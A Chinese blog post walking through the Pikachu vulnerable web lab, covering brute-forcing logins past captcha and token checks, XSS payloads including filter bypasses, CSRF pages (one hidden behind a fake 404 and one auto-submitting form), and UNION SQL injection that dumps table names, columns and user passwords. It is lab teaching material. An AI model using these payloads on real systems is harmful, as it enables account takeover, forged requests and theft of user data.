<!DOCTYPE html>












  


<html class="theme-next pisces use-motion" lang="zh-CN">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222">






  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-bounce.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=6.3.0" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.3.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon32x32.ico?v=6.3.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon16x16.ico?v=6.3.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.3.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '6.3.0',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="keywords" content="pikachu">
<meta property="og:type" content="article">
<meta property="og:title" content="pikachu">
<meta property="og:url" content="http://yoursite.com/2020/08/23/pikachu/index.html">
<meta property="og:site_name" content="我的安全世界">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://yoursite.com/images/pikachu/1.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/2.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/3.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/4.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/5.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/6.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/7.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/8.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/9.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/10.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/11.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/12.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/13.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/14.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/15.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/16.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/17.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/18.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/19.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/20.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/21.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/22.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/23.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/24.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/25.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/26.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/27.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/28.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/29.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/30.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/31.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/32.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/33.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/34.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/35.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/36.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/37.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/38.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/39.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/40.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/41.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/42.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/43.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/44.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/45.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/46.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/47.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/48.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/49.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/52.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/53.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/50.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/51.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/54.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/55.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/56.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/57.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/58.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/59.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/60.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/61.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/62.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/63.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/64.png">
<meta property="og:image" content="http://yoursite.com/images/pikachu/65.png">
<meta property="og:updated_time" content="2020-08-24T02:24:33.549Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="pikachu">
<meta name="twitter:image" content="http://yoursite.com/images/pikachu/1.png">






  <link rel="canonical" href="http://yoursite.com/2020/08/23/pikachu/"/>



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>pikachu | 我的安全世界</title>
  









  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">我的安全世界</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br />首页</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">
    <a href="/categories/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-th"></i> <br />分类</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />归档</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />标签</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-about">
    <a href="/about/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-user"></i> <br />关于</a>
  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />搜索</a>
        </li>
      
    </ul>
  

  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/08/23/pikachu/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="LoongEyes">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="我的安全世界">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">pikachu
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2020-08-23 19:10:00" itemprop="dateCreated datePublished" datetime="2020-08-23T19:10:00+08:00">2020-08-23</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">更新于</span>
                
                <time title="修改时间：2020-08-24 10:24:33" itemprop="dateModified" datetime="2020-08-24T10:24:33+08:00">2020-08-24</time>
              
            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/靶机/" itemprop="url" rel="index"><span itemprop="name">靶机</span></a></span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <hr>
<a id="more"></a>
<h1 id="暴力破解"><a href="#暴力破解" class="headerlink" title="暴力破解"></a>暴力破解</h1><h2 id="基于表单的暴力破解"><a href="#基于表单的暴力破解" class="headerlink" title="基于表单的暴力破解"></a>基于表单的暴力破解</h2><p><img src="/images/pikachu/1.png" alt="1.png"></p>
<h2 id="验证码绕过（on-server）"><a href="#验证码绕过（on-server）" class="headerlink" title="验证码绕过（on server）"></a>验证码绕过（on server）</h2><ol>
<li><p>抓包</p>
<p> <img src="/images/pikachu/2.png" alt="2.png"></p>
</li>
<li><p>修改账号密码，不修改验证码</p>
<p> <img src="/images/pikachu/3.png" alt="3.png"></p>
<p> 提示账号或密码错误，未提示验证码错误</p>
</li>
<li><p>修改验证码</p>
<p> <img src="/images/pikachu/4.png" alt="4.png"></p>
<p> 说明验证码无条件不刷新，无条件不刷新是指在某一时间段内，无论登录失败多少次，只要不刷新页面，就可以无限次的使用同一个验证码来对一个或多个用户帐号进行暴力猜解</p>
</li>
<li><p>对账号密码进行暴力破解</p>
<p> <img src="/images/pikachu/5.png" alt="5.png"></p>
</li>
</ol>
<h2 id="验证码绕过（on-client）"><a href="#验证码绕过（on-client）" class="headerlink" title="验证码绕过（on client）"></a>验证码绕过（on client）</h2><ol>
<li><p>尝试登录</p>
<p> <img src="/images/pikachu/6.png" alt="6.png"></p>
<p> 此时抓包无法获取请求包，说明验证码在客户端验证，验证成功之后才向服务器发起请求</p>
</li>
<li><p>抓包</p>
<p> 输入正确的验证码进行抓包</p>
<p> <img src="/images/pikachu/7.png" alt="7.png"></p>
<p> 虽然请求包中包含验证码字段，但并不在服务器进行验证，对账号密码进行暴力破解即可</p>
</li>
<li><p>暴力破解</p>
<p> <img src="/images/pikachu/8.png" alt="8.png"></p>
</li>
</ol>
<h2 id="token防爆破"><a href="#token防爆破" class="headerlink" title="token防爆破"></a>token防爆破</h2><ol>
<li><p>抓包</p>
<p> 发现请求包中出现<code>token</code>字段</p>
<p> <img src="/images/pikachu/9.png" alt="9.png"></p>
</li>
<li><p>发起请求，查看响应包</p>
<p> <img src="/images/pikachu/10.png" alt="10.png"></p>
<p> 发现响应包中存在一个<code>token</code>字段，此<code>token</code>为下一次请求所使用的<code>token</code>值</p>
</li>
<li><p>将请求包中的<code>token</code>改为下一次所用的<code>token</code>值</p>
<p> 对其进行暴力破解</p>
<p> <img src="/images/pikachu/11.png" alt="11.png"></p>
</li>
<li><p>对密码的破解使用普通列表</p>
<p> <img src="/images/pikachu/12.png" alt="12.png"></p>
</li>
<li><p>对<code>token</code>的字典需从响应包中获取</p>
<ol>
<li><p>设置请求的线程数为1</p>
<p> <img src="/images/pikachu/13.png" alt="13.png"></p>
</li>
<li><p>设置<code>Grep-Extract</code>处</p>
<p> <img src="/images/pikachu/14.png" alt="14.png"></p>
</li>
<li><p>获取<code>token</code>值，并且复制当前响应包的<code>token</code>值</p>
<p> <img src="/images/pikachu/15.png" alt="15.png"></p>
</li>
<li><p>设置第二个字典，粘贴上一步复制的<code>token</code>值</p>
<p> <img src="/images/pikachu/16.png" alt="16.png"></p>
</li>
</ol>
</li>
<li><p>开始破解</p>
<p> <img src="/images/pikachu/17.png" alt="17.png"></p>
</li>
</ol>
<hr>
<h1 id="XSS"><a href="#XSS" class="headerlink" title="XSS"></a>XSS</h1><h2 id="反射型XSS（get）"><a href="#反射型XSS（get）" class="headerlink" title="反射型XSS（get）"></a>反射型XSS（get）</h2><ol>
<li><p>尝试输入代码</p>
<p> <img src="/images/pikachu/18.png" alt="18.png"></p>
<p> 发现输入框限制了输入字符限制</p>
</li>
<li><p>可通过修改<code>html</code>代码来去除限制</p>
<p> <img src="/images/pikachu/19.png" alt="19.png"></p>
<p> <img src="/images/pikachu/20.png" alt="20.png"></p>
</li>
<li><p>可直接修改<code>url</code>中的参数绕过限制</p>
<p> <img src="/images/pikachu/21.png" alt="21.png"></p>
<p> <img src="/images/pikachu/22.png" alt="22.png"></p>
</li>
</ol>
<h2 id="反射型XSS（post）"><a href="#反射型XSS（post）" class="headerlink" title="反射型XSS（post）"></a>反射型XSS（post）</h2><p>先进行登录，登录后可进行<code>XSS</code>攻击</p>
<p><img src="/images/pikachu/23.png" alt="23.png"></p>
<h2 id="存储型XSS"><a href="#存储型XSS" class="headerlink" title="存储型XSS"></a>存储型XSS</h2><p><img src="/images/pikachu/24.png" alt="24.png"></p>
<h2 id="DOM型XSS"><a href="#DOM型XSS" class="headerlink" title="DOM型XSS"></a>DOM型XSS</h2><ol>
<li><p>尝试进行攻击,失败</p>
<p> <img src="/images/pikachu/25.png" alt="25.png"></p>
<p> <img src="/images/pikachu/26.png" alt="26.png"></p>
</li>
<li><p>查看网页元素</p>
<p> <img src="/images/pikachu/27.png" alt="27.png"></p>
<p> 可发现注入语句被填充在<code>a</code>标签中，成为链接</p>
</li>
<li><p>根据规则进行标签的闭合，使用<code>a</code>标签的单击事件</p>
<p> <img src="/images/pikachu/28.png" alt="28.png"></p>
<p> <img src="/images/pikachu/29.png" alt="29.png"></p>
</li>
</ol>
<h2 id="DOM型XSS-x"><a href="#DOM型XSS-x" class="headerlink" title="DOM型XSS-x"></a>DOM型XSS-x</h2><ol>
<li><p>尝试攻击，出现两层链接</p>
<p> <img src="/images/pikachu/30.png" alt="30.png"></p>
</li>
<li><p>查看页面元素，同样被包含在标签中</p>
<p> <img src="/images/pikachu/31.png" alt="31.png"></p>
</li>
<li><p>将标签进行闭合，触发攻击，<code>&#39; onclick=&quot;alert(&#39;xss&#39;)&quot;&gt;</code></p>
<p> <img src="/images/pikachu/32.png" alt="32.png"></p>
<p> <img src="/images/pikachu/33.png" alt="33.png"></p>
</li>
</ol>
<h2 id="XSS盲打"><a href="#XSS盲打" class="headerlink" title="XSS盲打"></a>XSS盲打</h2><p>盲打只是一种惯称的说法，就是不知道后台有没有<code>xss</code>存在的情况下，不顾一切的输入<code>xss</code>代码在所有的输入框中，尽可能多的尝试<code>xss</code>语句。</p>
<p><code>xss</code>盲打是指在攻击者对数据提交后展现的结果未知的情况下，网站采用了攻击者插入了带真实攻击功能的<code>xss</code>攻击代码（通常是使用<code>script</code>标签引入远程的<code>js</code>）的数据。当后台在展现时没有对这些提交的数据进行过滤，那么后台管理人员在操作时就会触发<code>xss</code>来实现攻击者预定好的真实攻击功能</p>
<ol>
<li><p>在所有的输入框中输入<code>xss</code>代码</p>
<p> <img src="/images/pikachu/34.png" alt="34.png"></p>
</li>
<li><p>登录后台</p>
<p> <img src="/images/pikachu/35.png" alt="35.png"></p>
</li>
<li><p>触发攻击</p>
<p> <img src="/images/pikachu/36.png" alt="36.png"></p>
</li>
</ol>
<h2 id="XSS之过滤"><a href="#XSS之过滤" class="headerlink" title="XSS之过滤"></a>XSS之过滤</h2><ol>
<li><p>输入攻击语句</p>
<p> <img src="/images/pikachu/37.png" alt="37.png"></p>
<p> 发现注入语句被过滤</p>
</li>
<li><p>采用大小写方式进行绕过</p>
<p> <img src="/images/pikachu/38.png" alt="38.png"></p>
<p> <img src="/images/pikachu/39.png" alt="39.png"></p>
</li>
</ol>
<h2 id="XSS之htmlspecialchars"><a href="#XSS之htmlspecialchars" class="headerlink" title="XSS之htmlspecialchars"></a>XSS之htmlspecialchars</h2><p><code>PHP</code> <code>htmlspecialchars()</code>函数把预定义的字符转换为 HTML 实体</p>
<p><code>&amp;</code>（和）成为<code>&amp;amp;</code></p>
<p><code>&quot;</code>（双引号）成为<code>&amp;quot;</code></p>
<p><code>&#39;</code>（单引号）成为<code>&amp;#039;</code></p>
<p><code>&lt;</code>（小于）成为<code>&amp;lt;</code></p>
<p><code>&gt;</code>（大于）成为<code>&amp;gt;</code></p>
<ol>
<li><p>尝试输入特殊字符</p>
<p> <img src="/images/pikachu/40.png" alt="40.png"></p>
<p> 发现过滤了<code>&quot;</code>与<code>&gt;</code></p>
</li>
<li><p>可以在攻击语句中避免使用过滤字符，<code>&#39; onclick=&#39;alert(/xss/)&#39;</code></p>
<p> <img src="/images/pikachu/41.png" alt="41.png"></p>
</li>
</ol>
<h2 id="XSS之href输出"><a href="#XSS之href输出" class="headerlink" title="XSS之href输出"></a>XSS之href输出</h2><ol>
<li><p>输入攻击语句</p>
<p> <img src="/images/pikachu/42.png" alt="42.png"></p>
<p> 发现攻击语句被填充到<code>herf</code>属性中</p>
</li>
<li><p>可以使用<code>js</code>语句来进行执行，<code>javascript:alert(/xss/)</code></p>
<p> <img src="/images/pikachu/43.png" alt="43.png"></p>
</li>
</ol>
<h2 id="XSS之js输出"><a href="#XSS之js输出" class="headerlink" title="XSS之js输出"></a>XSS之js输出</h2><ol>
<li><p>尝试输入攻击语句，无任何返回</p>
</li>
<li><p>尝试输入任意语句，得到返回</p>
<p> <img src="/images/pikachu/44.png" alt="44.png"></p>
<p> 发现所输入的语句被放到代码中进行判断</p>
 <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line">$ms=&apos;1111&apos;;</span><br><span class="line">if($ms.length != 0)&#123;</span><br><span class="line">    if($ms == &apos;tmac&apos;)&#123;</span><br><span class="line">        $(&apos;#fromjs&apos;).text(&apos;tmac确实厉害,看那小眼神..&apos;)</span><br><span class="line">    &#125;else &#123;</span><br><span class="line">       //alert($ms);</span><br><span class="line">        $(&apos;#fromjs&apos;).text(&apos;无论如何不要放弃心中所爱..&apos;)</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>根据规则进行代码闭合，<code>&#39;&lt;/script&gt;&lt;script&gt;alert(/xss/)&lt;/script&gt;</code></p>
<p> <img src="/images/pikachu/45.png" alt="45.png"></p>
<p> <img src="/images/pikachu/46.png" alt="46.png"></p>
 <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line">$ms=&apos;&apos;&lt;/script&gt;&lt;script&gt;alert(/xss/)&lt;/script&gt;&apos;;</span><br><span class="line">if($ms.length != 0)&#123;</span><br><span class="line">    if($ms == &apos;tmac&apos;)&#123;</span><br><span class="line">        $(&apos;#fromjs&apos;).text(&apos;tmac确实厉害,看那小眼神..&apos;)</span><br><span class="line">    &#125;else &#123;</span><br><span class="line">       //alert(&apos;&lt;/script&gt;&lt;script&gt;alert(/xss/)&lt;/script&gt;);</span><br><span class="line">        $(&apos;#fromjs&apos;).text(&apos;无论如何不要放弃心中所爱..&apos;)</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>
</li>
</ol>
<hr>
<h1 id="CSRF"><a href="#CSRF" class="headerlink" title="CSRF"></a>CSRF</h1><h2 id="CSRF（get）"><a href="#CSRF（get）" class="headerlink" title="CSRF（get）"></a>CSRF（get）</h2><ol>
<li><p>首先登录一个账号</p>
<p> <img src="/images/pikachu/47.png" alt="47.png"></p>
</li>
<li><p>修改个人信息，并抓包</p>
<p> 发现页面采取<code>get</code>的方式进行参数传递</p>
<p> <img src="/images/pikachu/48.png" alt="48.png"></p>
</li>
<li><p>构造恶意链接</p>
<p> <code>http://10.211.55.3/vul/csrf/csrfget/csrf_get_edit.php?sex=%E5%A5%B3&amp;phonenum=123123123&amp;add=qwe1&amp;email=123%40163.com&amp;submit=submit</code></p>
</li>
<li><p>在某一用户登录的情况下，诱使其访问恶意链接，可导致其遭受<code>CSRF</code>攻击</p>
<p> <img src="/images/pikachu/49.png" alt="49.png"></p>
</li>
<li><p>也可构造恶意页面，增强伪装</p>
 <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">   &lt;html&gt;</span><br><span class="line">   &lt;body&gt;</span><br><span class="line">   	&lt;img src=&quot;http://10.211.55.3/vul/csrf/csrfget/csrf_get_edit.php?sex=%E5%A5%B3&amp;phonenum=123123123&amp;add=qwe1&amp;email=123%40163.com&amp;submit=submit&quot; border=&quot;0&quot; style=&quot;display:none;&quot;/&gt;</span><br><span class="line">   	&lt;h1&gt;error&lt;/h1&gt;</span><br><span class="line">       &lt;h2&gt;404&lt;/h2&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>诱使登录用户进行访问</p>
<p> <img src="/images/pikachu/52.png" alt="52.png"></p>
<p> <img src="/images/pikachu/53.png" alt="53.png"></p>
</li>
</ol>
<h2 id="CSRF（post）"><a href="#CSRF（post）" class="headerlink" title="CSRF（post）"></a>CSRF（post）</h2><ol>
<li><p>登录用户，修改个人信息，抓包</p>
<p> 发现参数采用<code>post</code>的方式进行传递</p>
<p> <img src="/images/pikachu/50.png" alt="50.png"></p>
</li>
<li><p>构造恶意页面，发起恶意请求</p>
 <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">   &lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">   	&lt;script&gt;</span><br><span class="line">       	window.onload = function() &#123;</span><br><span class="line">       	document.getElementById(&quot;postsubmit&quot;).click();</span><br><span class="line">   	&#125;</span><br><span class="line">   	&lt;/script&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">   	&lt;form method=&quot;post&quot; action=&quot;http://10.211.55.3/vul/csrf/csrfpost/csrf_post_edit.php&quot;&gt;</span><br><span class="line">       	&lt;input id=&quot;sex&quot; type=&quot;text&quot; name=&quot;sex&quot; value=&quot;body&quot; /&gt;</span><br><span class="line">       	&lt;input id=&quot;phonenum&quot; type=&quot;text&quot; name=&quot;phonenum&quot; value=&quot;123456789&quot; /&gt;</span><br><span class="line">       	&lt;input id=&quot;add&quot; type=&quot;text&quot; name=&quot;add&quot; value=&quot;usa&quot; /&gt;</span><br><span class="line">       	&lt;input id=&quot;email&quot; type=&quot;text&quot; name=&quot;email&quot; value=&quot;vince@pikachu.com&quot; /&gt; </span><br><span class="line">       	&lt;input id=&quot;postsubmit&quot; type=&quot;submit&quot; name=&quot;submit&quot; value=&quot;submit&quot; /&gt;</span><br><span class="line">   	&lt;/form&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>在某一用户登录的情况下，诱使其访问恶意页面，造成<code>CSRF</code>攻击</p>
<p> <img src="/images/pikachu/51.png" alt="51.png"></p>
</li>
</ol>
<h2 id="CSRF（token）"><a href="#CSRF（token）" class="headerlink" title="CSRF（token）"></a>CSRF（token）</h2><p>登录用户，修改个人信息，抓包,发现在请求中包含随机的<code>token</code>值</p>
<p><img src="/images/pikachu/54.png" alt="54.png"></p>
<p>无法利用</p>
<hr>
<h1 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h1><h2 id="数字型注入（post）"><a href="#数字型注入（post）" class="headerlink" title="数字型注入（post）"></a>数字型注入（post）</h2><ol>
<li><p>抓包</p>
<p> <img src="/images/pikachu/55.png" alt="55.png"></p>
</li>
<li><p>判断是否存在注入</p>
<ol>
<li><p>输入单引号</p>
<p> <img src="/images/pikachu/56.png" alt="56.png"></p>
</li>
<li><p>输入<code>1 and 1=1</code></p>
<p> <img src="/images/pikachu/57.png" alt="57.png"></p>
</li>
<li><p>输入<code>1 and 1=2</code></p>
<p> <img src="/images/pikachu/58.png" alt="58.png"></p>
</li>
</ol>
</li>
<li><p>判断查询语句的字段数</p>
<p> <img src="/images/pikachu/59.png" alt="59.png"></p>
<p> <img src="/images/pikachu/60.png" alt="60.png"></p>
<p> <img src="/images/pikachu/61.png" alt="61.png"></p>
<p> 说明只有两个字段</p>
</li>
<li><p>获取数据库名</p>
<p> <img src="/images/pikachu/62.png" alt="62.png"></p>
</li>
<li><p>获取表名</p>
<p> <code>information_schema</code>数据库是<code>MySQL</code>自带的，它提供了访问数据库元数据的方式</p>
<p> 其中保存着关于<code>MySQL</code>服务器所维护的所有其他数据库的信息。如：数据库名，数据库的表，列的数据类型与访问权限等</p>
<p> <code>information_schema</code>数据库的<code>table</code>表：提供了关于数据库中的表的信息（包括视图）。详细表述了某个表属于哪个数据库，表类型，表引擎，创建时间等信息</p>
<p> <code>1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=&#39;pikachu&#39;</code></p>
<p> <img src="/images/pikachu/63.png" alt="63.png"></p>
</li>
<li><p>获取数据库中<code>users</code>表中的列</p>
<p> <code>information_schema</code>数据库的<code>columns</code>表：提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息</p>
<p> <code>1 union select 1,group_concat(column_name) from information_schema.columns where table_name=&#39;users&#39;</code></p>
<p> <img src="/images/pikachu/64.png" alt="64.png"></p>
</li>
<li><p>获取数据记录</p>
<p> <code>1 union select group_concat(id,username),group_concat(password) from users</code></p>
<p> <img src="/images/pikachu/65.png" alt="65.png"></p>
</li>
</ol>

      
    </div>

    

    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/pikachu/" <i class="fa fa-tag"></i> pikachu</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/06/17/Linux桌面美化/" rel="next" title="Linux桌面美化">
